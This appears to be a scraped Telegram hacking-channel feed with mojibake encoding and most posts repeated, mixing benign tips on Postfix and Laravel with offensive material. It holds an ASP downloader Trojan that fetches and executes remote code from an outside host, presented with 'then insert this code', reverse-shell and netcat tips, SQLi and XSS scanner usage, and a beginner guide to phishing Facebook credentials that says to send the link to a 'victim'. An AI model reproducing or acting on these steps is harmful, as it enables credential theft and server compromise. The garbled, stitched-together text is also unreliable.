β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ONLINE CRACKING :
Decrypt MD5 Hashed Strings 2020 WEBSITES :
1) md5online.org
2) md5crack.com
3) md5cracker.org
4) md5decrypt.org
5) crackstation.net
6) hashkiller.co.uk
7) reverse-hash-lookup.online-domain-tools.com
8) md5decrypt.net
9) onlinehashcrack.com
10) cmd5.org
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ONLINE CRACKING :
Decrypt MD5 Hashed Strings 2020 WEBSITES :
1) md5online.org
2) md5crack.com
3) md5cracker.org
4) md5decrypt.org
5) crackstation.net
6) hashkiller.co.uk
7) reverse-hash-lookup.online-domain-tools.com
8) md5decrypt.net
9) onlinehashcrack.com
10) cmd5.org
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEB HACKING #METHODE :
1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:
<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:
then insert this code :
https://pastebin.com/Xr4x50Za
enjoyβ€οΈππ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEB HACKING #METHODE :
1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:
<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:
then insert this code :
https://pastebin.com/Xr4x50Za
enjoyβ€οΈππ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Pastebin
xhack - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Reverse-Shells #FastTips ipsThis plays an integral part for owning machines. There are various reverse shells available and the most used among them is
βPentest Monkey PHP reverse shellβ available at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet .
> Do also check out https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Met hodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
1) Please ensure the the IP address you specied remains correct while inside php reverse shell. Verify it by ifcong tun0.
2) On usual approaches and if it is php-reverse-shell; simply reload the url location, a continuous loop with blank screen will surely generate the shell back the the terminal where netcat is listening.
3) I believe you have some knowledge of creating a Netcat Listener. nc -lvnp 4444 <- This is the port on which it is listening. Can be changed to something else too!
4) On occasions you get reverse shell but not tty shell, you can get it via the command- python -c βimport pty; pty.spawn(β/bin/bashβ)β
5) Upgrading to fully interactive TTY shell (working arrow keys and CTRL-C wonβt kill the reverse shell session). After python -c βimport pty; pty.spawn(β/bin/bashβ)β , hit CTRL-z (this will background the nc session). then on kali machine type βstty raw -echo β and enter. again, type βfgβ and enter. (input cannot be seen after hitting stty command so simply type
This will now give fully interactive TTY shell as if you were logged in via SSH.
6) For reference: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
7) the method of interactive TTY only works in linux. For windows alternative, rlwrap can be used.
Only arrow keys work and CTRL-C will kill the nc session in this case. Can be installed by:
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444
enjoyβ€οΈππ»
hack lib
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Reverse-Shells #FastTips ipsThis plays an integral part for owning machines. There are various reverse shells available and the most used among them is
βPentest Monkey PHP reverse shellβ available at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet .
> Do also check out https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Met hodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
1) Please ensure the the IP address you specied remains correct while inside php reverse shell. Verify it by ifcong tun0.
2) On usual approaches and if it is php-reverse-shell; simply reload the url location, a continuous loop with blank screen will surely generate the shell back the the terminal where netcat is listening.
3) I believe you have some knowledge of creating a Netcat Listener. nc -lvnp 4444 <- This is the port on which it is listening. Can be changed to something else too!
4) On occasions you get reverse shell but not tty shell, you can get it via the command- python -c βimport pty; pty.spawn(β/bin/bashβ)β
5) Upgrading to fully interactive TTY shell (working arrow keys and CTRL-C wonβt kill the reverse shell session). After python -c βimport pty; pty.spawn(β/bin/bashβ)β , hit CTRL-z (this will background the nc session). then on kali machine type βstty raw -echo β and enter. again, type βfgβ and enter. (input cannot be seen after hitting stty command so simply type
This will now give fully interactive TTY shell as if you were logged in via SSH.
6) For reference: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
7) the method of interactive TTY only works in linux. For windows alternative, rlwrap can be used.
Only arrow keys work and CTRL-C will kill the nc session in this case. Can be installed by:
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444
enjoyβ€οΈππ»
hack lib
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
ropnop blog
Upgrading Simple Shells to Fully Interactive TTYs
Catching a reverse shell over netcat is greatβ¦until you accidentally Ctrl-C and lose it. These techniques let you upgrade your shell to a proper TTY
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Another web hacking #tool
F E A T U R E S :
-A port scanner
-SQL injection scanner
-Dork checker
-Hash cracker
-Hash type verification tool
-Proxy finding tool
-XSS scanner
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Ekultek/Pybelt.git
2) cd Pybelt
3) pip install -r requirements.txt
4) C O M M A N D S:
python pybelt.py -p 127.0.0.1 Will run a port scan on your local host
python pybelt.py -s http://example.com/php?id=2 Will run a SQLi scan on the given URL
python pybelt.py -d idea?id=55 Will run a Dork check on the given Google Dork
python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Will attempt to crack the hash using all algorithms available on the computer
python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Will try to verify the hash type
python pybelt.py -f Will find usable proxies
python pybelt.py -x http://127.0.0.1/php?id=1 Will search the URL for XSS vulnerability
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Another web hacking #tool
F E A T U R E S :
-A port scanner
-SQL injection scanner
-Dork checker
-Hash cracker
-Hash type verification tool
-Proxy finding tool
-XSS scanner
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Ekultek/Pybelt.git
2) cd Pybelt
3) pip install -r requirements.txt
4) C O M M A N D S:
python pybelt.py -p 127.0.0.1 Will run a port scan on your local host
python pybelt.py -s http://example.com/php?id=2 Will run a SQLi scan on the given URL
python pybelt.py -d idea?id=55 Will run a Dork check on the given Google Dork
python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Will attempt to crack the hash using all algorithms available on the computer
python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Will try to verify the hash type
python pybelt.py -f Will find usable proxies
python pybelt.py -x http://127.0.0.1/php?id=1 Will search the URL for XSS vulnerability
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Ekultek/Pybelt: The hackers tool belt
The hackers tool belt. Contribute to Ekultek/Pybelt development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
rpm -qa | grep postfix2) Otherwise, you will install postfix using the following command:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
sudo netstat -ltnp | grep 254) Configuration for postfix email forwarding
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
postconf | grep config_directory5) Now, we have an idea that all postfix configuration files located in the directory /etc/postfix, so move inside the directory and edit the βmain.cfβ configuration file.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
= mydomain.com theanotherdomain.com7) Reload the postfix
virtual_alias_maps = hash:/etc/postfix/virtual
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
sudo /etc/init.d/postfix reload@UndercodeTesting
# or
$ sudo service postfix reload
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - evait-security/weeman: HTTP server for phishing in python
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravelβs cache.
You know by default Laravel uses the file cache driver. You want to use a speedier cache.
2) Use the Memcached cache driver.
Edit app/config/cache.php and change the driver to βmemcachedβ.
'driver' => 'memcached',
3) If you have multiple memcached servers, or theyβre running on something other than the local machine, youβll have to edit the memcached section of app/config/cache.php
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravelβs cache.
You know by default Laravel uses the file cache driver. You want to use a speedier cache.
2) Use the Memcached cache driver.
Edit app/config/cache.php and change the driver to βmemcachedβ.
'driver' => 'memcached',
3) If you have multiple memcached servers, or theyβre running on something other than the local machine, youβll have to edit the memcached section of app/config/cache.php
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 ANDROID VIDEO EDITORS APPS :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 ANDROID VIDEO EDITORS APPS :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Filmora: AI Video Editor&Maker - Apps on Google Play
AI Video EditorοΌAI Music, Text to Video,Text to Speech,Auto Caption,Video Effect
Forwarded from UNDERCODE NEWS
Musk recently used three little pigs to highlight his new brain-computer interface technology
#technologies
#technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A #tool to dump a git repository from a website.
1) git clone https://github.com/arthaud/git-dumper.git?
2)cd git-dumper
3) pip install -r requirements.txt
4) ./git-dumper.py http://website.com/.git ~/website
F E A T U R E S :
-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);
-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;
-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;
-Fetch all objects recursively, analyzing each commits to find their parents;
-Run git checkout . to recover the current working tree
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A #tool to dump a git repository from a website.
1) git clone https://github.com/arthaud/git-dumper.git?
2)cd git-dumper
3) pip install -r requirements.txt
4) ./git-dumper.py http://website.com/.git ~/website
F E A T U R E S :
-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);
-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;
-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;
-Fetch all objects recursively, analyzing each commits to find their parents;
-Run git checkout . to recover the current working tree
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
A tool to dump a git repository from a website. Contribute to arthaud/git-dumper development by creating an account on GitHub.
48718.c
1.9 KB
#dangerous shellCode
β Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β Tested on: WIN7x86
β Date: 2020-06-16
β Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β Tested on: WIN7x86
β Date: 2020-06-16